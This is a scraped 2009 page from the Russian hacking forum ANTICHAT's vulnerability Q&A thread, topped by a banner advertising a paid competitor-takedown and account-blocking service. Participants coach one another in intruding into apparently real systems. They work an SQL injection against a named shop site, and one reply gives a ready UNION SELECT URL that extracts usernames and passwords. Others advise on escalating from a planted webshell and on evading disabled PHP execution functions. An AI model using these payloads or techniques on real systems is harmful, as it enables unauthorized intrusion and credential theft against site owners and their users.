УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 788 из 1393

788

Опции темы

Поиск в этой теме

Опции просмотра

#7871

30.06.2009, 08:06

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

нужно искать сплоиты, для конкретной версии ядра, в данном случае 6.2, либо попробовать поискать баги в установленной версии веб сервера...
например тут: milw0rm.com

#7872

30.06.2009, 08:46

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

Цитата:

Сообщение от magichire

Залил вебшелл, но у него права nobody, соответственно сильно не разгуляешься (интересует редактирование файлов). Можно ли как то получить права хотя бы юзверя в папку которого залит шелл, кроме как рутать сервак?

Система Freeebsd 6.2.

Вроде нет сплоита под 6ку, по крайней мере в паблике.
Можно поискать сплоиты под сервисы, например sendmail.

#7873

30.06.2009, 08:51

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

FreeBSD 6x/7x
http://milw0rm.com/exploits/7581

#7874

30.06.2009, 11:03

-=ASSKAKO=-

Познающий

Регистрация: 10.01.2009

Сообщений: 31

Провел на форуме:
1128838

Репутация: 36

так как я тормоз, уже не могу третий день раскрутить скулю:
http://regina.kz/shop/index.php?CID=24'

Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

далее
http://regina.kz/shop/index.php?CID=24+order+by+5+--+

Код:

Unknown column '5' in 'order clause'

делаю
http://regina.kz/shop/index.php?CID=24+union+select+1,2,3,4+--+

Код:

The used SELECT statements have a different number of columns

потом немножка покурил посимвольный перебор и сипт набрутил это (мускуль=5 ветка):

Код:

Имя таблицы:Getted String number 57:mos_users

иду дальше с запросом:

Код:

SELECT/**/COLUMN_NAME/**/from/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x6d6f735f7573657273/**/LIMIT/**/{N1-15},1

и получил имена колонок.
далее хочу вытащить значения с таблицы mos_users:

Код:

SELECT/**/email/**/from/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x5c276d6f735f75736572735c27/**/LIMIT/**/{N1-5},1

ответ: Unknown column 'email' in 'field list'.
собсно, подскажите плз как вытащить значения с таблицы (table:mos_users; column:name,username,password) и где у меня ошибка?

#7875

30.06.2009, 11:22

bons

Участник форума

Регистрация: 20.12.2007

Сообщений: 295

Провел на форуме:
1777055

Репутация: 347

там рядом есть инъекция проще

Код:

http://regina.kz/shop/podrobno.php?CID=999&id=-1+union+select+1,2,username,4,5,6,7,password+from+mos_users+limit+0,1--

Последний раз редактировалось bons; 30.06.2009 в 11:25..

#7876

30.06.2009, 11:27

-=ASSKAKO=-

Познающий

Регистрация: 10.01.2009

Сообщений: 31

Провел на форуме:
1128838

Репутация: 36

Цитата:

Сообщение от bons

там рядом есть инъекция проще

Код:

http://regina.kz/shop/podrobno.php?CID=999&id=-1+union+select+1,2,username,4,5,6,7,password+from+mos_users+limit+0,1--

мона еще глупый вопрос: как ты подобрал кол-во полей? или мона линк на почитать?

#7877

30.06.2009, 11:31

bons

Участник форума

Регистрация: 20.12.2007

Сообщений: 295

Провел на форуме:
1777055

Репутация: 347

Цитата:

Сообщение от -=ASSKAKO=-

мона еще глупый вопрос: как ты подобрал кол-во полей? или мона линк на почитать?

полагаю так же как и ты, через ORDER BY, см
https://forum.antichat.ru/thread19844.html

#7878

30.06.2009, 12:55

~~Vish~~

Banned

Регистрация: 12.06.2009

Сообщений: 8

Провел на форуме:
26426

Репутация: 1

Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись:
Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361

Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже...

Есть ли в такой ситуации возможность просмотреть конфиг ?

#7879

30.06.2009, 13:34

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

Цитата:

Сообщение от Vish

1 залить другой шелл на пхп
2 залить шелл на другом языке, например на перле
3 покурить тему safe_mode bypass. есть даже видео от BlackSun
4 если надо только прочесть файл, то не обязательно иметь полноценный шелл с исполнение команд, можно просто сделать fopen. главное чтобы прав хватило.

#7880

30.06.2009, 13:41

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Цитата:

Сообщение от Vish

passthru(); ну или fopen(); copy();

Страница 788 из 1393

788

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход